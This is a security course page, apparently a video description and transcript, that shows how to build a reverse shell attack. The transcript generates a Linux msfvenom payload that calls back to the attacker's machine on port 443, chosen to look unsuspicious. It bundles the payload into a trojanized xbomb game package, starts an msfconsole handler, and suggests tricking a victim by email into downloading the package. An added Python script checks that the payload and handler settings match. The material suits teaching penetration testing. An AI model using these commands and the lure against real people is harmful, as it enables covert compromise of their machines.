Part 3 - Starting Handler for Reverse Shell



Time: 5 hours 38 minutes
Difficulty: Intermediate
CEU/CPE: 6
Video Description

A key component of a reverse shell attack is a handler that runs on the attacker's machine, listening on a designated port for the connection that the compromised target makes back to it. In this video we review the steps for generating the payload with msfvenom, packaging it into a trojanized installation file, and starting a matching handler with msfconsole. The objective is to get personnel with access to the victim host to install the trojanized xbomb game on the target machine. This is typically achieved by social engineering: the victim is tricked into clicking a link, which downloads and installs the trojanized game on the target.
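As an added example (not part of the course material), the following Python script checks the two things the walkthrough depends on before the victim ever clicks: that the encoded payload really contains none of the bytes msfvenom was told to avoid with -b, and that the msfconsole handler's PAYLOAD, LHOST and LPORT match what msfvenom was given. The two command lines, the payload name linux/x86/shell/reverse_tcp, the elf output format, the output path and the stand-in payload bytes are all constructed for this example and are not taken from the video.

```python
"""Consistency checks for an msfvenom payload and its msfconsole handler.

Added example, not part of the course: it parses a msfvenom command line
and a msfconsole -x handler command, verifies that PAYLOAD/LHOST/LPORT
agree, and scans the generated bytes for characters that -b was told to
avoid. All sample data below is constructed for the demonstration.
"""
import shlex

# Constructed command lines modelled on the walkthrough. The payload name,
# the elf format and the output path are assumptions, not from the video.
VENOM_CMD = (
    "msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp "
    "LHOST=192.168.26.129 LPORT=443 -b '\\x00' -f elf "
    "-o /tmp/work/usr/games/xbomb_scores"
)
HANDLER_CMD = (
    'msfconsole -q -x "use exploit/multi/handler; '
    "set payload linux/x86/shell/reverse_tcp; "
    'set LHOST 192.168.26.129; set LPORT 443; exploit; exit -y"'
)

# Stand-ins for msfvenom output (not real shellcode): 98 bytes each,
# one free of 0x00 and one with a null byte at offset 0.
CLEAN_PAYLOAD = bytes(range(1, 99))
DIRTY_PAYLOAD = bytes(range(0, 98))

OPTIONS_WITH_VALUE = ("-a", "-p", "-f", "-o", "-b", "-e", "--platform")


def parse_msfvenom(cmd: str) -> dict:
    """Return the flag/value pairs and VAR=value settings of a msfvenom line."""
    argv = shlex.split(cmd)
    opts = {}
    i = 1  # skip the program name
    while i < len(argv):
        tok = argv[i]
        if tok in OPTIONS_WITH_VALUE and i + 1 < len(argv):
            opts[tok] = argv[i + 1]
            i += 2
        elif "=" in tok:  # datastore settings such as LHOST=...
            key, value = tok.split("=", 1)
            opts[key.upper()] = value
            i += 1
        else:
            i += 1
    return opts


def parse_handler(cmd: str) -> dict:
    """Return the 'set NAME value' pairs from a msfconsole -x command string."""
    argv = shlex.split(cmd)
    script = argv[argv.index("-x") + 1]
    settings = {}
    for part in script.split(";"):
        words = part.split()
        if len(words) == 3 and words[0].lower() == "set":
            settings[words[1].upper()] = words[2]
    return settings


def handler_mismatches(venom_opts: dict, handler_settings: dict) -> list:
    """List the payload/LHOST/LPORT values that differ between the two sides."""
    problems = []
    pairs = (("-p", "PAYLOAD"), ("LHOST", "LHOST"), ("LPORT", "LPORT"))
    for venom_key, handler_key in pairs:
        a, b = venom_opts.get(venom_key), handler_settings.get(handler_key)
        if a != b:
            problems.append(f"{handler_key}: msfvenom={a!r} handler={b!r}")
    return problems


def bad_char_hits(payload: bytes, bad_chars: str) -> list:
    """Offsets in payload holding a byte from a -b list such as '\\x00\\x0a'."""
    forbidden = bytes.fromhex(bad_chars.replace("\\x", ""))
    return [i for i, b in enumerate(payload) if b in forbidden]


def audit(venom_cmd: str, handler_cmd: str, payload: bytes) -> list:
    """Combine both checks; an empty list means the pairing looks consistent."""
    venom_opts = parse_msfvenom(venom_cmd)
    problems = handler_mismatches(venom_opts, parse_handler(handler_cmd))
    hits = bad_char_hits(payload, venom_opts.get("-b", ""))
    if hits:
        problems.append(f"bad characters present at offsets {hits[:8]}")
    return problems


if __name__ == "__main__":
    wrong_port = HANDLER_CMD.replace("LPORT 443", "LPORT 4444")
    for label, cmd, data in (
        ("consistent pairing, clean bytes", HANDLER_CMD, CLEAN_PAYLOAD),
        ("handler on wrong port, null byte left in", wrong_port, DIRTY_PAYLOAD),
    ):
        print(f"{label}: {audit(VENOM_CMD, cmd, data) or 'OK'}")
```

In practice you would feed the real output file (`open(path, "rb").read()`) to `audit` after running msfvenom; a non-empty result means either the handler will never receive the callback or the stager may break on the characters it was supposed to avoid.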

Video Transcription
>> Now we're going to use the msfvenom command. Do help real quick. We can see what options this command takes. As we can see, this is our standalone payload generator. It replaces msfpayload and msfencode; they bundled the other functionality into this one tool. We can specify which payload we want to use. We can look at different output formats, choose the architecture. We can also eliminate characters to avoid, which we do have to do

>> for this particular example.

>> The command is lengthy to type in. Let's make my window a little bit bigger. It's going to wrap around anyway, but I'll explain the options that we need as we go through this. Msfvenom, and I need to tell it that my architecture is x86. The platform is Linux and I will specify my payload. It's a Linux payload and I've already looked up this path, so I know this is here, but you might have to go into your payloads and do some searches to find the right payload to use. This should work on a Debian Linux system, as long as it's x86 architecture. If it was AMD architecture, I'd have to specify a different architecture for dash a, as well as the payload would be different.

Now I'm going to specify my local host. That is 192.168.26.129. Then I'm going to specify the local port, and I'm going to use 443. That way it doesn't look like a suspicious port when the victim system is connected to this website. I'm going to exclude hex 0. This example would need a technical discussion as to why we need to exclude that, but sometimes when you're encoding a payload, certain characters cause problems with compatibility. In this one I know I need to exclude this. You may have to do your own research and a little bit of trial and error to get your encoding process to work correctly. My output format is going to be F. We'll look at the help for formats, look at the list after I generate the payload, and then my output file. Root, backdir, workdir. Then I want usr, games, xbomb_scores. That's part of the package; I'm replacing it with my file that has this payload bundled into it.

Running the command, this takes a few seconds. It tells me that it was able to encode with the shikata_ga_nai encoder. That's a popular encoder that works quite often. Here it tells me that it was 98 bytes and it was able to create the work, or create the payload. I'll look at the formats real quick. There's executable formats and then transformation formats. Executable formats, I've got a lot of different options here. F just happens to be the one that works correctly for this example. You have to trust me on that.

Now what I need to do is start my web server, because I want to make sure that I've got the webpage in place or

>> rather available when I want

>> to get the victim to click a link, which helps them to visit the website. My next step is to create a handler. The victim system is going to be, when they install the package, they will generate a reverse shell back to the attack machine. So I need to have a handler to listen for this connection. I can do this from another command line option using msfconsole. Let me do help for this real quick. We see for msfconsole, I can specify lots of different options to run commands from the command line without having to get into the console framework itself. We're going to tell it, for instance, that we want it to be in quiet mode so we don't see the startup banner, and then I'll specify the command I want to execute. I'll close that [inaudible] quote, so it runs as a complete command. Quiet mode, and I'm going to say use exploit multi handler. If I separate my commands with a semicolon, I can run several commands on one line effectively. It's a nice way to do a lot of work with one simple command. Of course, if you were doing this work regularly, you would save these commands in a file, which you could say you can just copy and paste them, or you could find them in your shell history as well.

Now I want to set the payload. Helps if you spell right. [LAUGHTER] Payload is going to be Linux because we know it's a Linux machine. The shell, if you recall, was an x86 shell, reverse TCP. This has to match the payload that I encoded so that the shell will connect to the proper handler; then the connection should work. I need to set my local host, and that's going to be 192.168.26.129. That's the attacker system. Another semicolon. I need to set my local port, and that's going to be 443, as we've previously seen. Then I'm going to run the exploit itself

>> and then lastly,

>> I will exit with a -y so that it doesn't prompt me for a connection. When this finishes running, it should tell me that it's binding to my current address. My local host is 129, port 443. I see which [inaudible] I've got my local host, my local port, and now the handler is running on that website because I started up my default Apache service on port 443. Now what I need to do is go to my victim system and start up my web browser. I'll go ahead and launch Iceweasel. I can verify that the web server is there by typing in its address. There's my default page that you get when Debian installs Apache. I know the website is reachable. As I mentioned before, through social engineering techniques, you would send an email to the victim saying, "Hey, try this new Minesweeper game that I created, xbomb." It's a lot of fun, maybe show some screenshots, make it look interesting. What we're going to do is get the file directly by using the wget command. I'm going to specify my address. This could be in the link, of course, that you would send to your victim. I have to make sure I get this exactly right. 2.2a-1_i386.deb. Double check that. That looks correct. On the victim machine, they click the link. It's not what I was expecting.